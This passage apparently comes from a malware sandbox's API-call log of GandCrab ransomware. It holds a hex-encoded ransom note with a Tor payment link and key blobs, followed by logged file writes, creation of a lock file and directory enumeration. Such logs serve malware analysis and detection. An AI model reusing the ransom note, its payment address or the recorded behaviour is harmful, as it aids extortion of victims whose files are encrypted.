x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0071.818] WriteFile (in: hFile=0x2cc, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259e824, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259e824*=0x2162, lpOverlapped=0x0) returned 1 [0071.819] CloseHandle (hObject=0x2cc) returned 1 [0071.819] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.819] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0071.819] GetSystemTime (in: lpSystemTime=0x25d0400 | out: lpSystemTime=0x25d0400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x11, wMilliseconds=0x89)) [0071.819] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0071.820] GetWindowsDirectoryW (in: lpBuffer=0x2630000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0071.820] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2630200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2630600, lpMaximumComponentLength=0x2630608, lpFileSystemFlags=0x2630604, lpFileSystemNameBuffer=0x2630400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2630600*=0xd2ca4def, lpMaximumComponentLength=0x2630608*=0xff, lpFileSystemFlags=0x2630604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0071.820] wsprintfW (in: param_1=0x25d0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1462094071-1423818996-289466292-1000\\d2ca4a09d2ca4deb61a.lock") returned 129 [0071.820] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1462094071-1423818996-289466292-1000\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\crypto\\rsa\\s-1-5-21-1462094071-1423818996-289466292-1000\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2cc [0071.822] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.822] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.822] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1462094071-1423818996-289466292-1000\\") returned 105 [0071.822] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1462094071-1423818996-289466292-1000\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1462094071-1423818996-289466292-1000\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1462094071-1423818996-289466292-1000\\*" [0071.822] 